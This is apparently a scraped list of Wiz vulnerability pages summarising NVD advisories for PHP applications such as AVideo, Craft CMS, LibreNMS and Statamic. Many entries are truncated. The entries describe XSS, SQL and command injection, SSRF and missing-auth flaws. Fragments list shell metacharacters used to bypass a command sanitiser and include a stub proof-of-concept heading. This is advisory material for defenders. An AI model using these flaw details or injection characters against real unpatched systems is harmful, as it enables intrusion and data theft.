Craft Commerce is an ecommerce platform for Craft CMS. Prior to 5.5.3, A stored XSS vulnerability exists in the Commerce Settings - Inventory Locations page. The Name field is rendered without proper HTML escaping, allowing an attacker to execute arbitrary JavaScript. This XSS triggers when an administrator (or user with product editing permissions) creates or edits a variant product. This vulnerability is fixed in 5.5.3.
Source : NVD
## 4.8
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.7
Exploitation Probability (EPSS) N/A
Affected
Wiz
CVE-2026-34732 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-34732 [MEDIUM] CVE-2026-34732 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34732 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the AVideo CreatePlugin template for list.json.php does not include any authentication or authorization check. While the companion templates add.json.php and delete.json.php both require admin privileges, the list.json.php template was shipped without this guard. Every plugin that uses the CreatePlugin code generator inherits this omission, resulting in 21 unauthenticated data listing endpoints across the platform. These endpoints expose sensitive data including user PII, payment transaction logs, IP addresses, user agents, and internal system records. At time of publication, there are no publicly available patches.
Source : NVD
## 7.5
Score
Publis
Wiz
CVE-2026-1323 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.2
CVE-2026-1323 [MEDIUM] CVE-2026-1323 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1323 :
PHP vulnerability analysis and mitigation
The extension fails to properly define allowed classes used when deserializing transport failure metadata. An attacker may exploit this to execute untrusted serialized code. Note that an active exploit requires write access to the directory configured at $GLOBALS['TYPO3_CONF_VARS']['MAIL']['transport_spool_filepath'].
Source : NVD
## 5.2
Score
Published March 17, 2026
Severity MEDIUM
CNA Score 5.2
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpsit/typo3-mailqueue
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Mar
Wiz
CVE-2026-33479 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-33479 [HIGH] CVE-2026-33479 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33479 :
PHP vulnerability analysis and mitigation
saveSort.json.php
$_REQUEST['sections']
eval()
User::isAdmin()
SameSite=None
Source : NVD
## 8.8
Score
Published March 23, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 34.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 21, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV
Wiz
CVE-2026-32813 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.0
CVE-2026-32813 [HIGH] CVE-2026-32813 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32813 :
PHP vulnerability analysis and mitigation
Admidio is an open-source user management solution. Versions 5.0.6 and below are vulnerable to arbitrary SQL Injection through the MyList configuration feature. The MyList configuration feature lets authenticated users define custom list column layouts, storing user-supplied column names, sort directions, and filter conditions in the adm_list_columns table via prepared statements. However, these stored values are later read back and interpolated directly into dynamically constructed SQL queries without sanitization or parameterization, creating a classic second-order SQL injection vulnerability (safe write, unsafe read). An attacker can exploit this to inject arbitrary SQL, potentially reading, modifying, or deleting any data
Wiz
CVE-2026-34568 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-34568 [CRITICAL] CVE-2026-34568 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34568 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when creating or editing blog posts. An attacker can inject a malicious JavaScript payload into blog post content, which is then stored server-side. This stored payload is later rendered unsafely in multiple application views without proper output encoding, leading to stored cross-site scripting (XSS). This issue has been patched in version 0.31.0.0.
Source : NVD
## 9
Score
Published April 1, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA
Wiz
CVE-2026-28502 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2026-28502 [CRITICAL] CVE-2026-28502 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28502 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. Prior to version 24.0, an authenticated Remote Code Execution (RCE) vulnerability was identified in AVideo related to the plugin upload/import functionality. The issue allowed an authenticated administrator to upload a specially crafted ZIP archive containing executable server-side files. Due to insufficient validation of extracted file contents, the archive was extracted directly into a web-accessible plugin directory, allowing arbitrary PHP code execution. This issue has been patched in version 24.0.
Source : NVD
## 9.3
Score
Published March 6, 2026
Severity CRITICAL
CNA Score 9.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Releas
Wiz
CVE-2026-33685 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-33685 [MEDIUM] CVE-2026-33685 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33685 :
PHP vulnerability analysis and mitigation
plugin/AD_Server/reports.json.php
reports.php
getCSV.php
User::isAdmin()
Source : NVD
## 5.3
Score
Published March 23, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 27
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV ex
Wiz
CVE-2026-26992 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-26992 [MEDIUM] CVE-2026-26992 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26992 :
PHP vulnerability analysis and mitigation
LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. In versions 26.1.1 and below, the port group name is not sanitized, allowing attackers with admin privileges to perform Stored Cross-Site Scripting (XSS) attacks. When a user adds a port group, an HTTP POST request is sent to the Request-URI "/port-groups". The name of the newly created port group is stored in the value of the name parameter. After the port group is created, the entry is displayed along with relevant buttons such as Edit and Delete. This issue has been fixed in version 26.2.0.
Source : NVD
## 5.1
Score
Published February 20, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV E
Wiz
CVE-2026-33171 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-33171 [MEDIUM] CVE-2026-33171 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33171 :
PHP vulnerability analysis and mitigation
.json
.yaml
.csv
filename
Source : NVD
## 4.3
Score
Published March 20, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
statamic/cms
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Mar 19, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h6rj-3m5
Wiz
CVE-2025-59021 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-59021 [MEDIUM] CVE-2025-59021 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-59021 :
PHP vulnerability analysis and mitigation
Backend users with access to the redirects module and write permission on the sys_redirect table were able to read, create, and modify any redirect record without restriction to the user’s own file-mounts or web-mounts. This allowed attackers to insert or alter redirects pointing to arbitrary URLs – facilitating phishing or other malicious redirect attacks. This issue affects TYPO3 CMS versions 10.0.0-10.4.54, 11.0.0-11.5.48, 12.0.0-12.4.40, 13.0.0-13.4.22 and 14.0.0-14.0.1.
Source : NVD
## 5.3
Score
Published January 13, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Typo3
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percen
Wiz
CVE-2026-32267 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.7
CVE-2026-32267 [HIGH] CVE-2026-32267 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32267 :
PHP vulnerability analysis and mitigation
Craft CMS is a content management system (CMS). From version 4.0.0-RC1 to before version 4.17.6 and from version 5.0.0-RC1 to before version 5.9.12, a low-privilege user (or an unauthenticated user who has been sent a shared URL) can escalate their privileges to admin by abusing UsersController->actionImpersonateWithToken. This issue has been patched in versions 4.17.6 and 5.9.12.
Source : NVD
## 7.7
Score
Published March 16, 2026
Severity HIGH
CNA Score 7.7
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3
Wiz
CVE-2026-25492 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-25492 [MEDIUM] CVE-2026-25492 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25492 :
PHP vulnerability analysis and mitigation
Craft CMS is a content management system. In Craft versions 3.5.0 through 4.16.17 and 5.0.0-RC1 through 5.8.21, the save_images_Asset GraphQL mutation can be abused to fetch internal URLs by providing a domain name that resolves to an internal IP address, bypassing hostname validation. When a non-image file extension such as .txt is allowed, downstream image validation is bypassed, which can allow an authenticated attacker with permission to use save_images_Asset to retrieve sensitive data such as AWS instance metadata credentials from the underlying host. This issue is patched in versions 4.16.18 and 5.8.22.
Source : NVD
## 5.3
Score
Published February 9, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Wiz
CVE-2026-34396 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-34396 [MEDIUM] CVE-2026-34396 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34396 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the AVideo admin panel renders plugin configuration values in HTML forms without applying htmlspecialchars() or any other output encoding. The jsonToFormElements() function in admin/functions.php directly interpolates user-controlled values into textarea contents, option elements, and input attributes. An attacker who can set a plugin configuration value (either as a compromised admin or by chaining with CSRF on admin/save.json.php) can inject arbitrary JavaScript that executes whenever any administrator visits the plugin configuration page. At time of publication, there are no publicly available patches.
Source : NVD
## 6.1
Score
Published March 3
Wiz
CVE-2026-26988 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2026-26988 [CRITICAL] CVE-2026-26988 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26988 :
PHP vulnerability analysis and mitigation
LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Versions 25.12.0 and below contain an SQL Injection vulnerability in the ajax_table.php endpoint. The application fails to properly sanitize or parameterize user input when processing IPv6 address searches. Specifically, the address parameter is split into an address and a prefix, and the prefix portion is directly concatenated into the SQL query string without validation. This allows an attacker to inject arbitrary SQL commands, potentially leading to unauthorized data access or database manipulation. This issue has been fixed in version 26.2.0.
Source : NVD
## 9.3
Score
Published February 20, 2026
Severity CRITICAL
CNA Score 9.3
Affected T
Wiz
CVE-2026-32629 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-32629 [MEDIUM] CVE-2026-32629 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32629 :
PHP vulnerability analysis and mitigation
phpMyFAQ is an open source FAQ web application. Prior to version 4.1.1, an unauthenticated attacker can submit a guest FAQ with an email address that is syntactically valid per RFC 5321 (quoted local part) yet contains raw HTML — for example " "@evil.com. PHP's FILTER_VALIDATE_EMAIL accepts this email as valid. The email is stored in the database without HTML sanitization and later rendered in the admin FAQ editor template using Twig's |raw filter, which bypasses auto-escaping entirely. This issue has been patched in version 4.1.1.
Source : NVD
## 5.4
Score
Published April 2, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA
Wiz
CVE-2025-67165 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2025-67165 [CRITICAL] CVE-2025-67165 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67165 :
PHP vulnerability analysis and mitigation
An Insecure Direct Object Reference (IDOR) in Pagekit CMS v1.0.18 allows attackers to escalate privileges.
Source : NVD
## 9.8
Score
Published December 17, 2025
Severity CRITICAL
CNA Score 9.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 24.5
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
pagekit/pagekit
Sources
NVD
Composer Severity CRITICAL No Fix Added at: Dec 21, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Scor
Wiz
CVE-2025-69212 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.4
CVE-2025-69212 [CRITICAL] CVE-2025-69212 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69212 :
PHP vulnerability analysis and mitigation
OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, a critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server.
Source : NVD
## 9.4
Score
Published February 6, 2026
Severity CRITICAL
CNA Score 9.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 30
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
devcode-it/openstamanager
S
Wiz
CVE-2025-69214 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2025-69214 [HIGH] CVE-2025-69214 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69214 :
PHP vulnerability analysis and mitigation
OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, an SQL Injection vulnerability exists in the ajax_select.php endpoint when handling the componenti operation. An authenticated attacker can inject malicious SQL code through the options[matricola] parameter.
Source : NVD
## 8.7
Score
Published February 6, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
devcode-it/openstamanager
Sources
NVD
Composer Severity HIGH No Fix Added a
Wiz
CVE-2026-30880 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
CVE-2026-30880 [CRITICAL] CVE-2026-30880 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30880 :
PHP vulnerability analysis and mitigation
baserCMS is a website development framework. Prior to version 5.2.3, baserCMS has an OS command injection vulnerability in the installer. This issue has been patched in version 5.2.3.
Source : NVD
## 9.2
Score
Published March 31, 2026
Severity CRITICAL
CNA Score 9.2
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 47.3
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
baserproject/basercms
Sources
NVD
Composer Severity CRITICAL Has Fix Added at: Apr 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, no
Wiz
CVE-2026-27196 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-27196 [HIGH] CVE-2026-27196 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27196 :
PHP vulnerability analysis and mitigation
Statmatic is a Laravel and Git powered content management system (CMS). Versions 5.73.8 and below in addition to 6.0.0-alpha.1 through 6.3.1 have a Stored XSS vulnerability in html fieldtypes which allows authenticated users with field management permissions to inject malicious JavaScript that executes when viewed by higher-privileged users. This issue has been fixed in 6.3.2 and 5.73.9.
Source : NVD
## 4.8
Score
Published February 21, 2026
Severity MEDIUM
CNA Score 8.1
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
statamic
Wiz
CVE-2026-33172 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-33172 [HIGH] CVE-2026-33172 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33172 :
PHP vulnerability analysis and mitigation
Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.14 and 6.7.0, a stored XSS vulnerability in SVG asset reuploads allows authenticated users with asset upload permissions to bypass SVG sanitization and inject malicious JavaScript that executes when the asset is viewed. This has been fixed in 5.73.14 and 6.7.0.
Source : NVD
## 8.7
Score
Published March 20, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
statamic/cms
Sources
NVD
Composer Severity HI
Wiz
GHSA-wprj-9cvc-5w37 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-wprj-9cvc-5w37 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-wprj-9cvc-5w37 :
PHP vulnerability analysis and mitigation
## Summary
list.json.php
## Details
add.json.php
delete.json.php
list.json.php
index.php
add.json.php
delete.json.php
User::isAdmin()
list.json.php
plugin/PayPalYPT/View/PayPalYPT_log/list.json.php:1-10
{"data": , ...}
User::isAdmin()
getAll()
ObjectYPT
SELECT * FROM PayPalYPT_log
plugin/PayPalYPT/View/PayPalYPT_log/add.json.php:13-16
if (!User::isAdmin()) {
$obj->msg = "You can't do this";
die(json_encode($obj));
}
configuration.php
.htaccess
plugin/PayPalYPT/Objects/PayPalYPT_log.php
agreement_id
users_id
json
recurring_payment_id
value
token
plugin/AuthorizeNet/View/Anet_webhook_log/list.json.php
plugin/BTCPayments/View/Btc_payments/list.json.php
list.json.php
## PoC
Step 1 — Dump
Wiz
CVE-2026-34737 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-34737 [MEDIUM] CVE-2026-34737 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34737 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the StripeYPT plugin includes a test.php debug endpoint that is accessible to any logged-in user, not just administrators. This endpoint processes Stripe webhook-style payloads and triggers subscription operations, including cancellation. Due to a bug in the retrieveSubscriptions() method that cancels subscriptions instead of merely retrieving them, any authenticated user can cancel arbitrary Stripe subscriptions by providing a subscription ID. At time of publication, there are no publicly available patches.
Source : NVD
## 6.5
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CI
Wiz
GHSA-g3hp-vvqf-8vw6 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-g3hp-vvqf-8vw6 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-g3hp-vvqf-8vw6 :
PHP vulnerability analysis and mitigation
## Summary
A stored XSS vulnerability exists in the User Permissions page. The User Group name is rendered without proper HTML escaping in the permissions section, allowing an attacker to execute arbitrary JavaScript when another user views or edits a user's permissions.
This is a separate vulnerability from the previously reported " Stored XSS via User Group Name in User Settings Page " and " Multiple Stored XSS in User Group Edit Page ". This affects a different sink: the individual user's permissions page.
## Proof of Concept
## Required Permissions
Admin access
allowAdminChanges
## Steps to Reproduce
Log in to the control panel as an admin
Navigate to Settings → Users → User Groups
Save the user group
Wiz
CVE-2026-33649 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-33649 [HIGH] CVE-2026-33649 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33649 :
PHP vulnerability analysis and mitigation
plugin/Permissions/setPermission.json.php
session.cookie_samesite=None
Source : NVD
## 8.8
Score
Published March 23, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Wiz
CVE-2026-33482 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-33482 [HIGH] CVE-2026-33482 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33482 :
PHP vulnerability analysis and mitigation
sanitizeFFmpegCommand()
plugin/API/standAlone/functions.php
&&
;
|
`
$()
sh -c
execAsync()
Source : NVD
## 8.1
Score
Published March 23, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 25.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 21, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Compo
Wiz
CVE-2025-61674 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-61674 [MEDIUM] CVE-2025-61674 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-61674 :
PHP vulnerability analysis and mitigation
October is a Content Management System (CMS) and web platform. Prior to versions 3.7.13 and 4.0.12, a cross-site scripting (XSS) vulnerability was identified in October CMS backend configuration forms. A user with the Global Editor Settings permission could inject malicious HTML/JS into the stylesheet input at Markup Styles. A specially crafted input could break out of the intended context, allowing arbitrary script execution across backend pages for all users. This issue has been patched in versions 3.7.13 and 4.0.12.
Source : NVD
## 4.8
Score
Published January 10, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA K
Wiz
CVE-2026-26991 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-26991 [MEDIUM] CVE-2026-26991 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26991 :
PHP vulnerability analysis and mitigation
LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. In versions 26.1.1 and below, the device group name is not sanitized, allowing attackers with admin privileges to perform Stored Cross-Site Scripting (XSS) attacks. When a user adds a device group, an HTTP POST request is sent to the Request-URI "/device-groups". The name of the newly created device group is stored in the value of the name parameter. After the device group is created, the entry is displayed along with relevant buttons such as Rediscover Devices, Edit, and Delete. This issue has been fixed in version 26.2.0.
Source : NVD
## 5.1
Score
Published February 20, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
PHP
Has Pub
Wiz
CVE-2026-24420 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-24420 [MEDIUM] CVE-2026-24420 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24420 :
PHP vulnerability analysis and mitigation
phpMyFAQ is an open source FAQ web application. Versions 4.0.16 and below allow an authenticated user without the dlattachment permission to download FAQ attachments due to a incomprehensive permissions check. The presence of a right key is improperly validated as proof of authorization in attachment.php. Additionally, the group and user permission logic contains a flawed conditional expression that may allow unauthorized access. This issue has been fixed in version
Source : NVD
## 6.5
Score
Published January 24, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.8
Wiz
CVE-2026-25487 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-25487 [MEDIUM] CVE-2026-25487 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25487 :
PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored XSS vulnerability in Craft Commerce allows attackers to execute malicious JavaScript in an administrator's browser. This occurs because the Tax Rates 'Name' field in the Store Management section is not properly sanitized before being displayed in the admin panel. This issue has been patched in versions 4.10.1 and 5.5.2.
Source : NVD
## 6.1
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.5
Exploitation Probabil
Wiz
CVE-2026-34383 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-34383 [MEDIUM] CVE-2026-34383 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34383 :
PHP vulnerability analysis and mitigation
Admidio is an open-source user management solution. Prior to version 5.0.8, the inventory module's item_save endpoint accepts a user-controllable POST parameter imported that, when set to true, completely bypasses both CSRF token validation and server-side form validation. An authenticated user can craft a direct POST request to save arbitrary inventory item data without CSRF protection and without the field value checks that the FormPresenter validation normally enforces. This issue has been patched in version 5.0.8.
Source : NVD
## 3.5
Score
Published March 31, 2026
Severity LOW
CNA Score 4.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-33884 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-33884 [MEDIUM] CVE-2026-33884 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33884 :
PHP vulnerability analysis and mitigation
Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.16 and 6.7.2, an authenticated Control Panel user with access to live preview could use a live preview token to access restricted content that the token was not intended for. This has been fixed in 5.73.16 and 6.7.2.
Source : NVD
## 4.3
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
statamic/cms
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Mar 29, 2026
## Get
Wiz
CVE-2026-24788 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-24788 [HIGH] CVE-2026-24788 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24788 :
PHP vulnerability analysis and mitigation
RaspAP raspap-webgui versions prior to 3.3.6 contain an OS command injection vulnerability. If exploited, an arbitrary OS command may be executed by a user who can log in to the product.
Source : NVD
## 8.7
Score
Published February 2, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 28.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
billz/raspap-webgui
Sources
NVD
Composer Severity HIGH Has Fix Added at: Feb 03, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not jus
Wiz
CVE-2026-24417 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-24417 [HIGH] CVE-2026-24417 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24417 :
PHP vulnerability analysis and mitigation
